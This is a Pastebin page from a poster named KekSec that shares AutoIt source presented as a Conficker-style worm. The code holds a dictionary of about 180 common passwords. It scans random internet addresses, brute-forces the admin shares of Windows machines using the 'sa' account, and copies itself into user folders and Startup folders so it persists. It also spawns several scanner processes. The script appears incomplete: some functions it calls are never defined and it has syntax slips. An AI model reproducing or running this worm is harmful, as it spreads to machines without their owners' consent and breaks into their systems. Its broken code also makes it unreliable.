API tools faq
paste
KekSec

Conficker worm source code in autoit :3

KekSec
May 8th, 2018
914
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 7.95 KB | None | 0 0
raw download clone embed print report
  1. Dim $user[5]
  2. $user[0] = "S-1-3-0"
  3. $user[1] = "S-1-1-0"
  4. $user[2] = "S-1-5-2"
  5. $user[3] = "S-1-5-4"
  6. $user[4] = "S-1-5-18"
  7.  
  8. Dim $pass[181]
  9. $pass[0]="00000"
  10. $pass[1]="0000000"
  11. $pass[2]="00000000"
  12. $pass[3]="0987654321"
  13. $pass[4]="11111"
  14. $pass[5]="111111"
  15. $pass[6]="1111111"
  16. $pass[7]="11111111"
  17. $pass[8]="123123"
  18. $pass[9]="12321"
  19. $pass[10]="123321"
  20. $pass[11]="12345"
  21. $pass[12]="123456"
  22. $pass[13]="1234567"
  23. $pass[14]="12345678"
  24. $pass[15]="123456789"
  25. $pass[16]="1234567890"
  26. $pass[17]="1234abcd"
  27. $pass[18]="1234qwer"
  28. $pass[19]="123abc"
  29. $pass[20]="123asd"
  30. $pass[21]="123qwe"
  31. $pass[22]="1q2w3e"
  32. $pass[23]="22222"
  33. $pass[24]="222222"
  34. $pass[25]="2222222"
  35. $pass[26]="22222222"
  36. $pass[27]="33333"
  37. $pass[28]="333333"
  38. $pass[29]="3333333"
  39. $pass[30]="33333333"
  40. $pass[31]="44444"
  41. $pass[32]="444444"
  42. $pass[33]="4444444"
  43. $pass[34]="44444444"
  44. $pass[35]="54321"
  45. $pass[36]="55555"
  46. $pass[37]="555555"
  47. $pass[38]="5555555"
  48. $pass[39]="55555555"
  49. $pass[40]="654321"
  50. $pass[41]="66666"
  51. $pass[42]="666666"
  52. $pass[43]="6666666"
  53. $pass[44]="66666666"
  54. $pass[45]="7654321"
  55. $pass[46]="77777"
  56. $pass[47]="777777"
  57. $pass[48]="7777777"
  58. $pass[49]="77777777"
  59. $pass[50]="87654321"
  60. $pass[51]="88888"
  61. $pass[52]="888888"
  62. $pass[53]="8888888"
  63. $pass[54]="88888888"
  64. $pass[55]="987654321"
  65. $pass[56]="99999"
  66. $pass[57]="999999"
  67. $pass[58]="9999999"
  68. $pass[59]="99999999"
  69. $pass[60]="a1b2c3"
  70. $pass[61]="aaaaa"
  71. $pass[62]="abc123"
  72. $pass[63]="academia"
  73. $pass[64]="access"
  74. $pass[65]="account"
  75. $pass[66]="Admin"
  76. $pass[67]="admin"
  77. $pass[68]="admin1"
  78. $pass[69]="admin12"
  79. $pass[70]="admin123"
  80. $pass[71]="adminadmin"
  81. $pass[72]="administrator"
  82. $pass[73]="anything"
  83. $pass[74]="asddsa"
  84. $pass[75]="asdfgh"
  85. $pass[76]="asdsa"
  86. $pass[77]="asdzxc"
  87. $pass[78]="backup"
  88. $pass[79]="boss123"
  89. $pass[80]="business"
  90. $pass[81]="campus"
  91. $pass[82]="changeme"
  92. $pass[83]="cluster"
  93. $pass[84]="codename"
  94. $pass[85]="codeword"
  95. $pass[86]="coffee"
  96. $pass[87]="computer"
  97. $pass[88]="controller"
  98. $pass[89]="cookie"
  99. $pass[90]="customer"
  100. $pass[91]="database"
  101. $pass[92]="default"
  102. $pass[93]="desktop"
  103. $pass[94]="domain"
  104. $pass[95]="example"
  105. $pass[96]="exchange"
  106. $pass[97]="explorer"
  107. $pass[98]="files"
  108. $pass[99]="foobar"
  109. $pass[100]="foofoo"
  110. $pass[101]="forever"
  111. $pass[102]="freedom"
  112. $pass[103]="games"
  113. $pass[104]="home123"
  114. $pass[105]="ihaveno$pass"
  115. $pass[106]="Internet"
  116. $pass[107]="internet"
  117. $pass[108]="intranet"
  118. $pass[109]="killer"
  119. $pass[110]="letitbe"
  120. $pass[111]="letmein"
  121. $pass[112]="Login"
  122. $pass[113]="login"
  123. $pass[114]="lotus"
  124. $pass[115]="love123"
  125. $pass[116]="manager"
  126. $pass[117]="market"
  127. $pass[118]="money"
  128. $pass[119]="monitor"
  129. $pass[120]="my$pass"
  130. $pass[121]="my$password"
  131. $pass[122]="mypc123"
  132. $pass[123]="nimda"
  133. $pass[124]="nobody"
  134. $pass[125]="no$pass"
  135. $pass[126]="no$password"
  136. $pass[127]="nothing"
  137. $pass[128]="office"
  138. $pass[129]="oracle"
  139. $pass[130]="owner"
  140. $pass[131]="$pass1"
  141. $pass[132]="$pass12"
  142. $pass[133]="$pass123"
  143. $pass[134]="$passwd"
  144. $pass[135]="$password"
  145. $pass[136]="$password"
  146. $pass[137]="$password1"
  147. $pass[138]="$password12"
  148. $pass[139]="$password123"
  149. $pass[140]="private"
  150. $pass[141]="public"
  151. $pass[142]="pw123"
  152. $pass[143]="q1w2e3"
  153. $pass[144]="qazwsx"
  154. $pass[145]="qazwsxedc"
  155. $pass[146]="qqqqq"
  156. $pass[147]="qwe123"
  157. $pass[148]="qweasd"
  158. $pass[149]="qweasdzxc"
  159. $pass[150]="qweewq"
  160. $pass[151]="qwerty"
  161. $pass[152]="qwewq"
  162. $pass[153]="root123"
  163. $pass[154]="rootroot"
  164. $pass[155]="sample"
  165. $pass[156]="secret"
  166. $pass[157]="secure"
  167. $pass[158]="security"
  168. $pass[159]="server"
  169. $pass[160]="shadow"
  170. $pass[161]="share"
  171. $pass[162]="student"
  172. $pass[163]="super"
  173. $pass[164]="superuser"
  174. $pass[165]="supervisor"
  175. $pass[166]="system"
  176. $pass[167]="temp123"
  177. $pass[168]="temporary"
  178. $pass[169]="temptemp"
  179. $pass[170]="test123"
  180. $pass[171]="testtest"
  181. $pass[172]="unknown"
  182. $pass[173]="windows"
  183. $pass[174]="work123"
  184. $pass[175]="xxxxx"
  185. $pass[176]="zxccxz"
  186. $pass[177]="zxcvb"
  187. $pass[178]="zxcvbn"
  188. $pass[179]="zxcxz"
  189. $pass[180]="zzzzz"
  190. Func _try_infectDrive()
  191.     If FileExists("X:\") Then
  192.         FileCopy(@ScriptFullPath, "X:\", $smbSpreadName)
  193.         Local $hSearch = FileFindFirstFile("X:\Users\*")
  194.         Local $sUserName = "", $iResult = 0
  195.         While 1
  196.             $sUserName = FileFindNextFile($hSearch)
  197.             FileCopy(@ScriptFullPath, "X:\Users\" & $sUserName & "\" & $smbSpreadName)
  198.             If @error Then ExitLoop
  199.             Local $hhSearch = FileFindFirstFile("X:\Users\" & $sUserName & "\*")
  200.             Local $sUserFolder = "", $iResult = 0
  201.             While 1
  202.                 $sUserFolder = FileFindNextFile($hhSearch)
  203.                 If @error Then ExitLoop
  204.                 FileCopy(@ScriptFullPath, "X:\Users\" & $sUserName & "\" & $sUserFolder & "\" & $smbSpreadName)
  205.                 FileCopy(@ScriptFullPath, "x:\Users\" & $sUserName & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" & $smbSpreadName)
  206.             WEnd
  207.             FileClose($hhSearch)
  208.         WEnd
  209.         FileClose($hSearch)
  210.     EndIf
  211. EndIf
  212. If $CmdLine[1] = "WAN" Then
  213.     While 1
  214.         $IP = Random(0,255,1) & "." & Random(0,255,1) & "." & Random(0,255,1) & "." & Random(0,255,1)
  215.         If Ping($IP) > 0 Then
  216.             _WinNet_AddConnection2("X:", "\\" & $IP & "\C$")
  217.             _try_infectDrive()
  218.             _WinNet_AddConnection2("X:", "\\" & $IP & "\Users$")
  219.             _try_infectDrive()
  220.             If Not FileExists("X:\") Then
  221.                 For $i = 0 To UBound($pass) - 1
  222.                     _WinNet_AddConnection2("X:", "\\" & $IP & "\C$", "sa", $pass[$i])
  223.                     If FileExists("X:\") Then
  224.                         _try_infectDrive()
  225.                         ExitLoop
  226.                     EndIf
  227.                 Next
  228.             EndIf
  229.             infectDrive($pass)
  230.         EndIf
  231.     Wend
  232. ElseIf $CmdLine[1] = "SM" Then
  233.     _SendMail()
  234. Endif
  235. Func _WinNet_AddConnection2($sLocalName, $sRemoteName, $sUserName = 0, $sPassword = 0, $iType = 1, $iOptions = 1)
  236.     Const $tagNETRESOURCE = "dword Scope;dword Type;dword DisplayType;dword Usage;ptr LocalName;ptr RemoteName;ptr Comment;ptr Provider"
  237.     Const $CONNECT_UPDATE_PROFILE = 0x00000001
  238.     Const $CONNECT_INTERACTIVE = 0x00000008
  239.     Const $CONNECT_PROMPT = 0x00000010
  240.     Const $CONNECT_REDIRECT = 0x00000080
  241.     Const $CONNECT_LOCALDRIVE = 0x00000100
  242.     Const $CONNECT_COMMANDLINE = 0x00000800
  243.     Const $CONNECT_CMD_SAVECRED = 0x00001000
  244.     Local $tLocalName = DllStructCreate("wchar Text[1024]")
  245.     Local $pLocalName = DllStructGetPtr($tLocalName)
  246.     DllStructSetData($tLocalName, "Text", $sLocalName)
  247.  
  248.     Local $tRemoteName = DllStructCreate("wchar Text[1024]")
  249.     Local $pRemoteName = DllStructGetPtr($tRemoteName)
  250.     DllStructSetData($tRemoteName, "Text", $sRemoteName)
  251.  
  252.     Local $tUserName = 0
  253.     If IsString($sUserName) Then
  254.         $tUserName = DllStructCreate("wchar Text[1024]")
  255.         DllStructSetData($tUserName, "Text", $sUserName)
  256.     EndIf
  257.  
  258.     Local $tPassword = 0
  259.     If IsString($sPassword) Then
  260.         $tPassword = DllStructCreate("wchar Text[1024]")
  261.         DllStructSetData($tPassword, "Text", $sPassword)
  262.     EndIf
  263.  
  264.     Local $iFlags = 0
  265.     If BitAND($iOptions, 1) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_UPDATE_PROFILE)
  266.     If BitAND($iOptions, 2) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_INTERACTIVE)
  267.     If BitAND($iOptions, 4) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_PROMPT)
  268.     If BitAND($iOptions, 8) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_REDIRECT)
  269.     If BitAND($iOptions, 16) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_COMMANDLINE)
  270.     If BitAND($iOptions, 32) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_CMD_SAVECRED)
  271.  
  272.     Local $tResource = DllStructCreate($tagNETRESOURCE)
  273.     DllStructSetData($tResource, "Type", $iType)
  274.     DllStructSetData($tResource, "LocalName", $pLocalName)
  275.     DllStructSetData($tResource, "RemoteName", $pRemoteName)
  276.  
  277.     Local $aResult = DllCall("mpr.dll", "dword", "WNetAddConnection2W", "struct*", $tResource, "struct*", $tPassword, "struct*", $tUserName, "dword", $iFlags)
  278.     If @error Then Return SetError(@error, @extended, False)
  279.     Return SetError($aResult[0], 0, $aResult[0] = 0)
  280. EndFunc   ;==>_WinNet_AddConnection2
  281.  
  282. For $threads = 0 To 16
  283.     Run(Chr(34) & @ScriptFullPath & Chr(34) & " Scan")
  284. Next
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!